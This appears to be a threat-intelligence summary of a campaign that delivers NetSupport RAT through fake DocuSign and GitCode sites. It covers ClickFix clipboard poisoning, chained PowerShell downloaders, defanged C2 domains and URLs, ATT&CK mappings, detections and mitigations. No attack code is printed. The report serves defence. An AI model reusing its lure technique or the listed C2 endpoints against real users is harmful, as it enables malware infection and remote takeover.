Full Report
Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and DocuSign. "
Analysis Summary
# Tool/Technique: NetSupport RAT (Remote Access Trojan)
## Overview
NetSupport RAT is the final payload delivered via a multi-stage attack involving deceptive websites impersonating DocuSign and GitCode. The initial infection vector relies on luring victims into executing complex, obfuscated PowerShell scripts downloaded from these fraudulent sites.
## Technical Details
- Type: Malware Family (Remote Access Trojan)
- Platform: Windows (Implied by use of PowerShell and Windows Run command)
- Capabilities: Remote control, file system access, persistence establishment.
- First Seen: Not explicitly stated in the context, but the campaign utilizing it is recent.
## MITRE ATT&CK Mapping
*Note: Mappings are based on the described delivery mechanism and the nature of a RAT.*
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Implied by persistence script `wbdims.exe`)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Used in PowerShell scripts)
## Functionality
### Core Capabilities
- Remote Access and Control via the NetSupport RAT payload.
- Establishing persistence on the host system using a downloaded script (`wbdims.exe`).
### Advanced Features
The delivery mechanism exhibits advanced chaining and evasion techniques:
1. **Multi-Stage PowerShell Downloaders:** Successive layered PowerShell scripts are executed, each downloading and launching the next stage to obfuscate the final payload source.
2. **Clipboard Poisoning (DocuSign variant):** Leveraging simulated CAPTCHA verification to secretly copy a malicious PowerShell command to the victim's clipboard, instructing them to run it via the 'Win + R' dialog.
## Indicators of Compromise
- File Hashes: N/A (None provided in the text)
- File Names: `wbdims.exe` (Persistence script), `jp2launcher.exe` (Executable deployed from the final ZIP payload)
- Registry Keys: N/A (Persistence mechanism likely involved a Run key, but specific key path is not detailed)
- Network Indicators:
- `tradingviewtool[.]com` (C2/Download server for intermediate scripts)
- `docusign[.]sa[.]com/verification/c.php` (C2 endpoint for persistence check-in)
- `docusign[.]sa[.]com/verification/s.php?an=1` (C2 endpoint for second-stage script delivery)
- Behavioral Indicators: Execution of PowerShell scripts initiated via the Windows Run dialog (`Win + R`), downloading subsequent scripts hosted on potentially malicious domains, and subsequent deployment of an executable named `jp2launcher.exe`.
## Associated Threat Actors
The specific threat actor group is not named in the context, but the methods described are associated with sophisticated campaigns utilizing widely available RATs.
## Detection Methods
- Signature-based detection: Signatures for the NetSupport RAT executable and potentially for the persistence file `wbdims.exe` or the final payload.
- Behavioral detection: Monitoring for chained PowerShell execution initiated by user interaction (like pasting via Run command), especially scripts contacting C2 domains like `tradingviewtool[.]com` or `docusign[.]sa[.]com`.
- YARA rules: Potential YARA rules targeting known strings or binary artifacts associated with NetSupport RAT.
## Mitigation Strategies
- **User Awareness:** Training users to be highly skeptical of unexpected links, especially those promising document access (DocuSign) or code repositories (GitCode), and warning against running commands copied from websites.
- **Application Control:** Restricting the execution of PowerShell scripts from random locations or execution methods (like the Run box without user context).
- **Network Filtering:** Blocking connections to the identified C2 domains (`tradingviewtool[.]com`, `docusign[.]sa[.]com`).
- **Endpoint Hardening:** Implementing robust real-time monitoring for persistence mechanisms (e.g., monitoring for changes to common autostart locations).
## Related Tools/Techniques
- **EDDIESTEALER infostealer:** Mentioned as being delivered via similar ClickFix-style phishing attack chains, indicating a shared attacker methodology or vendor for initial access spam.
- **ClickFix CAPTCHA mechanism:** Used in the DocuSign variant to trick users into executing commands, demonstrating a shared social engineering lure.